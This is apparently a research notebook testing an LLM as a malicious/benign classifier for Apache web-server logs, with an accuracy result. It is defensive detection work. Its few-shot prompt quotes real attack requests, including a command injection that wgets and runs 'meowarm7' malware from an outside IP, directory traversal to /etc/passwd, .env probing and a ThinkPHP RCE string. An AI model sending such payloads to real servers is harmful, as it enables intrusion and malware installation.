In [1]:
from vllm import LLM, SamplingParams
from transformers import AutoTokenizer, pipeline
import pandas as pd
from datasets import Dataset
from torch.utils.data import DataLoader
import os

INFO 04-02 16:29:31 [__init__.py:239] Automatically detected platform cuda.


##### dataset_path = "logs.csv"

In [3]:
def load_csv(dataset_path):
    df = pd.read_csv(dataset_path, skiprows=lambda x: x in range(1), names=['log', 'label', 'category', 'misc'])
    return df

In [4]:
df = load_csv(dataset_path)
df = df.drop(df.columns[3], axis=1)

In [5]:
count_ones = (df['label'] == 1).sum()
count_ones

2257

In [6]:
count_zeros = (df['label'] == 0).sum()
count_zeros

790

In [7]:
def drop_category(df):
    df = df.drop(columns=['category'])
    return df


In [8]:
df = drop_category(df)
df

,log,label
0,45.164.177.160 - - [23/Feb/2025:21:12:44 +0000...,1
1,195.178.110.163 - - [23/Feb/2025:18:09:47 +000...,0
2,195.178.110.163 - - [23/Feb/2025:18:09:47 +000...,1
3,195.178.110.163 - - [23/Feb/2025:18:09:47 +000...,1
4,195.178.110.163 - - [23/Feb/2025:18:09:47 +000...,1
...,...,...
3042,146.179.87.42 - - [01/Apr/2025:23:22:56 +0000]...,1
3043,146.179.87.42 - - [01/Apr/2025:23:22:56 +0000]...,1
3044,146.179.87.42 - - [01/Apr/2025:23:22:56 +0000]...,0
3045,146.179.87.42 - - [01/Apr/2025:23:22:56 +0000]...,1


In [9]:
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
llm = LLM(model="Qwen/Qwen2.5-7B-Instruct")
sampling_params = SamplingParams(temperature=0.7, top_p=0.8, repetition_penalty=1.05, max_tokens=1024)
tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2.5-7B-Instruct")

INFO 04-02 16:31:51 [config.py:585] This model supports multiple tasks: {'classify', 'generate', 'embed', 'reward', 'score'}. Defaulting to 'generate'.
INFO 04-02 16:31:51 [config.py:1697] Chunked prefill is enabled with max_num_batched_tokens=8192.
INFO 04-02 16:31:54 [core.py:54] Initializing a V1 LLM engine (v0.8.2) with config: model='Qwen/Qwen2.5-7B-Instruct', speculative_config=None, tokenizer='Qwen/Qwen2.5-7B-Instruct', skip_tokenizer_init=False, tokenizer_mode=auto, revision=None, override_neuron_config=None, tokenizer_revision=None, trust_remote_code=False, dtype=torch.bfloat16, max_seq_len=32768, download_dir=None, load_format=LoadFormat.AUTO, tensor_parallel_size=1, pipeline_parallel_size=1, disable_custom_all_reduce=False, quantization=None, enforce_eager=False, kv_cache_dtype=auto,  device_config=cuda, decoding_config=DecodingConfig(guided_decoding_backend='xgrammar', reasoning_backend=None), observability_config=ObservabilityConfig(show_hidden_metrics=False, otlp_traces_e

Loading safetensors checkpoint shards:   0% Completed | 0/4 [00:00<?, ?it/s]


INFO 04-02 16:32:38 [loader.py:447] Loading weights took 30.84 seconds
INFO 04-02 16:32:38 [gpu_model_runner.py:1186] Model loading took 14.2487 GB and 33.894145 seconds
INFO 04-02 16:33:07 [backends.py:415] Using cache directory: /rds/general/user/rm521/home/.cache/vllm/torch_compile_cache/916db28585/rank_0_0 for vLLM's torch.compile
INFO 04-02 16:33:08 [backends.py:425] Dynamo bytecode transform time: 29.55 s
INFO 04-02 16:33:09 [backends.py:115] Directly load the compiled graph for shape None from the cache
INFO 04-02 16:33:14 [monitor.py:33] torch.compile takes 29.55 s in total
INFO 04-02 16:33:16 [kv_cache_utils.py:566] GPU KV cache size: 370,512 tokens
INFO 04-02 16:33:16 [kv_cache_utils.py:569] Maximum concurrency for 32,768 tokens per request: 11.31x
INFO 04-02 16:33:34 [gpu_model_runner.py:1534] Graph capturing finished in 18 secs, took 0.49 GiB
INFO 04-02 16:33:34 [core.py:151] init engine (profile, create kv cache, warmup model) took 55.81 seconds


In [10]:
dataset=Dataset.from_pandas(df)

In [11]:
def generate_few_shot(log):
    messages = [
        {"role": "system", "content": "You are a cybersecurity expert analyzing Apache log entries to detect potential security threats."},
        {"role": "user", "content": "Given a log entry collected from Apache HTTP server, classify it as ""Malicious"" or ""Benign"". \n\
        If malicious, briefly explain why. If benign, just return the classification. Output must be in JSON format for structured parsing. \n\
        Format: \n\
        {{ \n""classification"": ""Malicious or Benign"",\n\
        ""reason"": ""Explanation if malicious, otherwise empty""\n\
        }}\n\
        Examples: \n\
        Log Entry 0: 84.252.135.0 - - [12/Mar/2025:03:22:48 +0000] ""HEAD /.env.~ HTTP/1.1"" 404 196 ""-"" ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67""\n\
        Response:\n\
        {{\n\
          ""classification"": ""Malicious"",\n\
          ""reason"": ""Attempt to access .env.~ file, potentially to gather sensitive information such as credentials or configuration data.""\n\
        }}\n\
        Log Entry 1: 146.169.25.131 - - [30/Sep/2018:06:30:09 +0100] ""GET /~mwj/moin-static/csg/css/sIFR-screen.css HTTP/1.1"" 302 291 ""https://www.doc.ic.ac.uk/csg-res/dynamic/motd.cgi"" ""Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36"" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256\n\
        Response:\n\
        {{\n\
          ""classification"": ""Benign"",\n\
          ""reason"": "" ""\n\
        }}\n\
        Log Entry 2: 118.194.249.72 - - [25/Feb/2025:09:44:43 +0000] ""GET /config.json HTTP/1.1"" 404 438 ""-"" ""Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11""\n\
        Response:\n\
        {{\n\
          ""classification"": ""Malicious"",\n\
          ""reason"": ""The request attempts to access 'config.json', which is a common target for reconnaissance or sensitive data exposure attacks.""\n\
        }}\n\
        Log Entry 3: 185.40.4.51 - - [21/Mar/2025:06:58:23 +0000] ""POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20meowarm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Fmeowarm7%3B%20chmod%20777%20%2A%3B%20.%2Fmeowarm7%20tbk HTTP/1.1"" 400 483 ""-"" ""-""\n\
        Response:\n\
        {{\n\
            ""classification"": ""Malicious"",\n\
            ""reason"": ""The request contains a command injection attempt, trying to execute shell commands to download and execute a potential malware ('meowarm7') from an external server (42.112.26.36).""\n\
        }}\n\
        Log Entry 4: 185.226.196.28 - - [21/Mar/2025:13:40:30 +0000] ""HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1"" 400 161 ""-"" ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36""\n\
        Response:\n\
        {{\n\
            ""classification"": ""Malicious"",\n\
            ""reason"": ""The request attempts directory traversal ('/.%2e/%2e%2e/') to access restricted files, which is a common reconnaissance technique used by attackers to exploit vulnerabilities in web servers.""\n\
        }}\n\
        Log Entry 5: 142.93.117.195 - - [09/Mar/2025:21:43:36 +0000] ""POST /xmlrpc/pingback HTTP/1.1"" 404 457 ""-"" ""Mozilla/5.0 (Ubuntu; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0""\n\
        Response:\n\
        {{\n\
            ""classification"": ""Malicious"",\n\
            ""reason"": ""The request targets '/xmlrpc/pingback', which is commonly exploited in WordPress XML-RPC Pingback attacks to perform DDoS amplification or reconnaissance.""\n\
        }}\n\
        Log Entry 6: 142.93.117.195 - - [09/Mar/2025:21:43:35 +0000] ""GET /lwa/Webpages/LwaClient.aspx?meeturl=aHR0cDovL2N2NzA3NDE1cGRmZWU0YWRlNW5nNXUxaHh4M3RuazhuZi5vYXN0Lm1lLz9pZD1IRjklMjV7MTMzNyoxMzM3fSMueHgvLw== HTTP/1.1"" 404 457 ""-"" ""Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36""\n\
        Response:\n\
        {{\n\
            ""classification"": ""Malicious"",\n\
            ""reason"": ""The request targets 'LwaClient.aspx' with a suspicious Base64-encoded URL parameter, which suggests an attempt to exploit a web application vulnerability or conduct phishing or redirection attacks.""\n\
        }}\n\
        Log Entry 7: 58.210.197.13 - - [04/Mar/2025:11:41:02 +0000] ""GET /public/index.php?s=/index/\\\\think\\\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1"" 404 493 ""-"" ""Custom-AsyncHttpClient""\n\
        Response:\n\
        {{\n\
            ""classification"": ""Malicious"",\n\
            ""reason"": ""The request targets a PHP vulnerability in the ThinkPHP framework, attempting a remote code execution (RCE) attack using the 'call_user_func_array' function and the 'md5' hashing function.""\n\
        }}\n\
        Based on the previous examples, classify the following log entry based on its content and behavior, rather than determining if the request was successful, disregarding the '404' status code. The log is :" + log},
    ]
    return messages


In [12]:
def generate_zero_shot(log):
    messages = [
        {"role": "system", "content": "You are a cybersecurity expert analyzing Apache log entries to detect potential security threats."},
        {"role": "user", "content": "Given a log entry collected from Apache HTTP server, classify it as ""Malicious"" or ""Benign"". \n\
        If malicious, briefly explain why. If benign, just return the classification. Output must be in JSON format for structured parsing. \n\
        Format: \n\
        {{ \n""classification"": ""Malicious or Benign"",\n\
        ""reason"": ""Explanation if malicious, otherwise empty""\n\
        }}\n\
        Log:" + log},
    ]
    return messages

In [13]:
def classify_log(prompts):
    predictions = []
    text = tokenizer.apply_chat_template(
        prompts,
        tokenize=False,
        add_generation_prompt=True
    )
    outputs = llm.generate(text, sampling_params)
    for output in outputs:
        generated_answer = output.outputs[0].text
        print(generated_answer)
        generated_answer = generated_answer.lower()
        for line in generated_answer.split("\n"):
            if "classification" in line:
                if "benign" in line:
                    predictions.append(0)
                    break
                if "malicious" in line:
                    predictions.append(1)
                    break
    return predictions


In [17]:
dataloader = DataLoader(dataset, batch_size=5, shuffle=False)
predictions = []
for batch in dataloader:
    prompts = []
    for log in batch['log']:
        prompts.append(generate_zero_shot(log))        
    predictions.extend(classify_log(prompts))


Processed prompts: 100%|██████████| 5/5 [00:01<00:00,  2.51it/s, est. speed input: 478.54 toks/s, output: 113.86 toks/s]


```json
{
    "classification": "Malicious",
    "reason": "The log entry contains a command to download and execute a potentially malicious script (Mozi.m) using wget, which is indicative of a security threat."
}
```
```json
{
    "classification": "Benign",
    "reason": ""
}
```
```json
{
  "classification": "Malicious",
  "reason": "The request is attempting to access a hidden directory (/.git/config) which is typically used for version control and should not be accessible via HTTP. This could indicate an attempt to exploit a server by probing for sensitive information."
}
```
```json
{
    "classification": "Malicious",
    "reason": "The request is attempting to access a sensitive file (/.env.live) which could contain critical application credentials and configuration details."
}
```
```json
{
    "classification": "Malicious",
    "reason": "The request is trying to access a .git directory, which could indicate an attempt to retrieve version control information that might be use

Processed prompts: 100%|██████████| 5/5 [00:01<00:00,  2.77it/s, est. speed input: 501.97 toks/s, output: 111.79 toks/s]


```json
{
  "classification": "Benign",
  "reason": ""
}
```
```json
{
  "classification": "Benign",
  "reason": ""
}
```
```json
{
    "classification": "Malicious",
    "reason": "The request is attempting to access a sensitive file (.env) which often contains configuration and API keys. This behavior is indicative of an attempt to gather information that could be used for further attacks."
}
```
```json
{
  "classification": "Malicious",
  "reason": "The request is attempting to access a sensitive directory (.git/config) which could indicate an attempt to retrieve version control system configuration files, often used by attackers to identify and exploit repositories."
}
```
```json
{
    "classification": "Malicious",
    "reason": "The request attempts to access a hidden directory (.git), which is often used to discover version control system configurations that could potentially leak sensitive information."
}
```


Processed prompts: 100%|██████████| 5/5 [00:02<00:00,  2.44it/s, est. speed input: 499.15 toks/s, output: 130.89 toks/s]


...

```json
{
  "classification": "Benign",
  "reason": ""
}
```
```json
{
  "classification": "Malicious",
  "reason": "The request is attempting to access sensitive system files (e.g., /etc/passwd) using a potentially malicious method (HEAD request with a long and suspicious path). This behavior is indicative of a possible reconnaissance or probing attack."
}
```
```json
{
    "classification": "Malicious",
    "reason": "The log entry shows an attempt to access the `/etc/passwd` file using a directory traversal attack (../../../../../../../etc/passwd%00). This is a common technique used by attackers to gain unauthorized access to sensitive information."
}
```
```json
{
    "classification": "Benign",
    "reason": ""
}
```
```json
{
  "classification": "Malicious",
  "reason": "The log entry shows an attempt to exploit a web application by using a potentially malicious URL with a script injection (XSS) attempt."
}
```


Processed prompts: 100%|██████████| 5/5 [00:02<00:00,  2.37it/s, est. speed input: 514.81 toks/s, output: 86.83 toks/s]


```json
{
    "classification": "Malicious",
    "reason": "The log entry shows an attempt to access a file path that involves directory traversal ('../../../../../../../../../') and an attempt to retrieve sensitive information ('/etc/passwd'). This is indicative of a potential attack aiming to gain unauthorized access to system files."
}
```
```json
{
  "classification": "Benign",
  "reason": ""
}
```
```json
{
    "classification": "Malicious",
    "reason": "The log entry contains unusual and potentially harmful query parameters, including encoded script tags that could be used for XSS attacks, and an excessive length of the URL which is suspicious."
}
```
```json
{
  "classification": "Benign",
  "reason": ""
}
```
```json
{
  "classification": "Benign",
  "reason": ""
}
```


Processed prompts: 100%|██████████| 2/2 [00:01<00:00,  1.04it/s, est. speed input: 219.25 toks/s, output: 61.68 toks/s]

```json
{
  "classification": "Malicious",
  "reason": "The request is attempting to access a sensitive file on the server (etc/passwd) using directory traversal techniques (../../../../../../../../../../etc/passwd). This is indicative of an attempt to exploit the server for unauthorized information retrieval."
}
```
```json
{
  "classification": "Malicious",
  "reason": "The log entry shows an attempt to access a PHP file with a potentially malicious query parameter that includes script tags and an alert function, which is indicative of a possible injection attack."
}
```


In [18]:
df['prediction'] = predictions
print(f"Len: {len(predictions)}, len of df: {len(df)}")
print(df)

Len: 3047, len of df: 3047
                                                    log  label  prediction
0     45.164.177.160 - - [23/Feb/2025:21:12:44 +0000...      1           1
1     195.178.110.163 - - [23/Feb/2025:18:09:47 +000...      0           0
2     195.178.110.163 - - [23/Feb/2025:18:09:47 +000...      1           1
3     195.178.110.163 - - [23/Feb/2025:18:09:47 +000...      1           1
4     195.178.110.163 - - [23/Feb/2025:18:09:47 +000...      1           1
...                                                 ...    ...         ...
3042  146.179.87.42 - - [01/Apr/2025:23:22:56 +0000]...      1           1
3043  146.179.87.42 - - [01/Apr/2025:23:22:56 +0000]...      1           0
3044  146.179.87.42 - - [01/Apr/2025:23:22:56 +0000]...      0           0
3045  146.179.87.42 - - [01/Apr/2025:23:22:56 +0000]...      1           1
3046  146.179.87.42 - - [01/Apr/2025:23:22:56 +0000]...      1           1

[3047 rows x 3 columns]


In [19]:
correct_count = (df['label'] == df['prediction']).sum()
total_count = len(df)
accuracy = correct_count / total_count
print(f"Accuracy: {accuracy}")

Accuracy: 0.4702986544141779
